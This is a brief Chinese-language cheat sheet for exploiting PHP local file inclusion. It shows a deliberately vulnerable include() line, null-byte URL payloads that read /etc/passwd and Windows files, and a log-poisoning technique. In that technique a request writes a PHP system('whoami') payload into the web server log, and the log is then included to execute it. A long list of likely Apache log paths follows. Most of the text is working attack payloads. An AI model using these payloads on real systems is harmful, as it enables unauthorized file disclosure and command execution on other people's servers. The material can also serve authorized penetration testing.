代码:
<?php include($_GET['for'].‘.php’);//用于测试本地包含漏洞 ?>
Linux
test.php?for=/etc/passwd%00
Win
test.php?for=D:\readme.txt%00
Log Injection
访问任意页面payload,将payload写入到log中,然后包含log文件执行payload。
test.php?<php%20system('whoami');?>
DoFuck
//linux test.php?for=/var/log/apache/logs/access_log%00 //win test.php?for=..\apache\logs\access.log%00
可能的log路径
/etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /opt/lampp/logs/access_log /opt/lampp/logs/error_log /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/error.log /usr/local/apache/logs/error_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/www/logs/thttpd_log /var/apache/logs/access_log /var/apache/logs/error_log /var/log/apache/access.log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/thttpd_log /var/www/log/access_log /var/www/log/error_log /var/www/logs/access.log /var/www/logs/access_log /var/www/logs/error.log /var/www/logs/error_log C:\apache\logs\access.log C:\apache\logs\error.log C:\Program Files\Apache Group\Apache\logs\access.log C:\Program Files\Apache Group\Apache\logs\error.log C:\program files\wamp\apache2\logs C:\wamp\apache2\logs C:\wamp\logs C:\xampp\apache\logs\access.log C:\xampp\apache\logs\error.log
参考:http://downloads.ackack.net/LocalFileInclusion.pdf